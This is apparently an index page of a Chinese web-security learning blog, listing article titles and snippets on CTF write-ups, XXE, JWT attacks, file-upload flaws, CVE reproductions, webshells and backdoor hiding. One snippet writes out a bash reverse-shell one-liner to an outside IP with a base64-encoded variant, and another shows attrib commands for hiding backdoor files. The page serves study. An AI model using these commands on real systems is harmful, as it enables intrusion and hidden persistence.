
Web安全学习篇
文章平均质量分 64
学习记录
paidx0
主要记录日常学习笔记和有意思题目的题解,静下心来学习少说多做。
成长只有从试错中一步步靠近。
展开
-
[GoogleCTF2019 Quals]Bnv(本地DTD文件与XXE学习)
[GoogleCTF2019 Quals]Bnv(本地DTD文件与XXE学习)原创 2022-08-17 16:46:42 · 398 阅读 · 0 评论 -
Xpath注入学习记录
XPath 是一门在 XML 文档中查找信息的语言。XPath 可用来在 XML 文档中对元素和属性进行遍历。XPath 是 W3C XSLT 标准的主要元素,并且 XQuery 和 XPointer 都构建于 XPath 表达之上。XML 不是 HTML的代替,HTML旨在显示信息,XML旨在显示传输信息,关注的是数据的内容。......原创 2022-08-19 01:03:51 · 560 阅读 · 0 评论 -
CTF中命令执行常用绕过姿势
CTF中命令执行时Bypass原创 2022-07-13 16:40:09 · 47 阅读 · 0 评论 -
vulnstack红日-4
vulnstack红日-4原创 2022-07-11 01:18:58 · 406 阅读 · 0 评论 -
vulnstack红日-三
vulnstack红日-三原创 2022-07-06 23:30:57 · 559 阅读 · 0 评论 -
Nmap使用手册学习记录
简单记录一下nmap的一些基本指令,别问,问就是命令太多了,英文文档翻得累,nmap的扫描功能和隐蔽性很强大的,很有必要多看看原创 2022-06-29 21:23:24 · 277 阅读 · 0 评论 -
Go测试远控免杀学习
Go远控免杀学习原创 2022-05-07 20:30:13 · 2206 阅读 · 10 评论 -
后门隐藏几个技巧
文章目录1、 attrib +s +h2、ADS数据流3、php环境变量包含4、不死马5、php.ini 后门6、关键字拆分,多文件包含1、 attrib +s +hWindows下即使开启了显示隐藏文件也是看不到的attrib +s +h test.php参数说明:+r 设置只读属性-r 取消只读属性+a 设置存档属性-a 取消存档属性+s 设置系统属性-s 取消系统属性+h 设置隐藏属性-h 取消隐藏属性/s 显示目录下所有文件的属性/d 将attrib和任意命令行原创 2022-05-01 15:36:39 · 880 阅读 · 0 评论 -
Linux反弹shell学习
前言当我们可以在远程Linux主机上执行任意命令或写入任意的数据到任意的文件的时候通常会通过反弹一个shell 来控制远程主机bash 反弹shellLinux反弹shell使用这条命令,但反弹回来的shell是不可交互的bash -i >& /dev/tcp/10.10.10.134/2333 0>&1也可以{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjI3LzQ0NDQgMD4mMSA=}|{base64,-原创 2021-09-06 14:47:24 · 1684 阅读 · 1 评论 -
无字母数字的Webshell
无字母数字的Webshell直接看题,边看边说<?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); }原创 2021-08-13 23:21:12 · 621 阅读 · 0 评论 -
CVE-2018-19518 PHP-IMAP 复现和学习 (环境CTFShow web312)
CVE-2018-19518复现和学习漏洞描述IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数imap_open( string $mailbox,string $user,string $password)其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubuntu中默认使用ssh来代替rs原创 2021-08-09 12:30:55 · 515 阅读 · 0 评论 -
perl脚本GET系统命令执行
题目来自 [HITCON 2017]SSRFme代码的思路很简单,就是会先建一个文件夹sandbox/md5(orange+ip),然后将url的值写到filename文件中$data = shell_exec("GET " . escapeshellarg($_GET["url"]));这行代码开始以为就是GET请求,所以想到了file协议去读文件,但这种做法是错误的简单记录一下perl脚本GET系统命令执行的学习简单来看看使用GET如何来执行系统命令。具体为啥原因我也说不上来,大概原创 2021-10-22 23:46:51 · 980 阅读 · 0 评论 -
XML外部实体注入学习
前言最近做题做到XXE 这类型的题,也没有系统学习过,只是简单知道他和 XML 有关,这次就了解了一下XXE 漏洞简单了解XMLXML 指可扩展标记语言(EXtensible Markup Language)XML 是一种标记语言,很类似 HTMLXML 被设计为传输和存储数据,其焦点是数据的内容XML 被设计用来结构化、存储以及传输信息XML 允许创作者定义自己的标签和自己的文档结构XML的优点xml是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,原创 2021-08-26 00:42:42 · 1644 阅读 · 4 评论 -
information_schema过滤与无列名注入
前言在手工SQL注入时,我们常常会想着利用 information_schema库 来进行爆数据库名、表名、字段名,但如果 information_schema库 被禁用了怎么办?正好遇到了这样一道题,所以来记录一下学习简单介绍一下information_schema库mysql中的information_schma这个库是干嘛的,在sql注入中它的作用是什么,那么有没有可以替代这个库的方法呢?简单来说,information_schma库就像是mysql的信息数据库,它保存着mysql服务原创 2021-08-30 02:13:26 · 3166 阅读 · 3 评论 -
CVE-2019-11043 PHP-FPM 复现和学习(环境CTFShow web311)
CVE-2019-11043复现和学习漏洞描述CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg原创 2021-08-09 11:51:20 · 556 阅读 · 0 评论 -
JWT的认识和攻击方法
什么是JWTJWT ( JSON Web Token 的缩写)是一串带有声明信息的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT可用于身份认证、会话状态维持、信息交换等。JWT 由三部分构成,分别称为 header 、payload 和 signature ,各部分用. 相连构成一个完整的Tokenxxxxxx.yyyyyyy.zzzzzz# header :使用一个JSON格式字符串声明t原创 2021-07-25 14:11:18 · 683 阅读 · 0 评论 -
文件上传漏洞系列总结(三),持续更新。。。。
一、编辑器漏洞编辑器属于第三方软件,它的作用是方便网站管理员上传或编辑网站上的内容, 类似我们电脑上的Word文档。常用编辑器:FCKeditorEWEbeditorCKFinderUEDITORDotNet TextBoxCute Editor常见的两种编辑器是FCK和eWEBFCK编辑器漏洞利用FCKeditor常见上传目录:FCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor原创 2022-01-26 17:49:37 · 4173 阅读 · 0 评论 -
文件上传漏洞系列总结(一),持续更新。。。。
文件上传漏洞原理Web 应用程序通常会有上传的功能,只要Web应用程序允许上传文件就有可能存在文件上传漏洞文件上传与SQL注入比较可能危害更大,如果网站存在文件上传漏洞,攻击者可以直接传一个Webshell到服务器。一句话马原理1、一句话马服务端...原创 2021-10-14 17:58:09 · 252 阅读 · 0 评论 -
文件上传漏洞系列总结(二),持续更新。。。。
前言上一篇讲解了文件上传的原理,和图片马的制作,然后一些简单的JS、MIME、大小写、点空格、htaccess的文件绕过上传。下面继续一、PHP345文件绕过上传PHP3代表PHP版本3,这里可以用于文件绕过检测一般的软件都是可以向下兼容的,所以PHP3的代码PHP5同样可以执行利用这一点就可以上传-test.php3或test.php4来绕过二、Windows::$DATA 绕过这个方式只适合Windows,是NTFS文件系统的一个特性NTFS文件系统在储存数据流的一个属性DATA时,是原创 2021-10-16 23:05:48 · 2061 阅读 · 0 评论 -
深入研究preg_replace \e模式下的代码执行
深入研究preg_replace与代码执行下面将深入研究 preg_replace /e 模式下的代码执行问题,其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常非常多,相信看完你也能学到很多案例分析<?phpfunction complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")',原创 2021-08-21 01:33:55 · 3375 阅读 · 4 评论 -
pear文件包含学习记录
中文全称PHP扩展应用库php go-pear.php即可安装,没有就先要去官网下 go-pear.php一般都是装在/usr/local/lib/php/pearcmd.php然后就是要在php.ini处找到这个给打开register_argc_argv=ON,默认也是开启的下面就可以愉快的测试了正文开启register_argc_argv 有什么用处?开启了之后$_SERVER[‘argv’]就开始生效了<?phpvar_dump($_SERVER);?> ["arg原创 2022-04-07 09:42:31 · 872 阅读 · 1 评论 -
Windows系统漏洞之5次Shift漏洞启动计算机
一.原理知识当我们使用计算机时,连续按下5次shift键会弹出一个程序程序名称为“esthc.exe”,其路径为“c:\windows\system32\sethc.exe”。该系统漏洞由于部分Win7及Win10在未进入系统时,可以通过连续按5次shift键弹出 sethc.exe应用程序,然后再深入利用调出CMD窗口,通过指令对用户密码进行修改或删除,从而登录不知道密码的计算机。首先,在未登录系统时,连续按5次shift键,弹出程序 “c:\windows\system32\sethc.ex原创 2022-01-26 19:54:50 · 12755 阅读 · 12 评论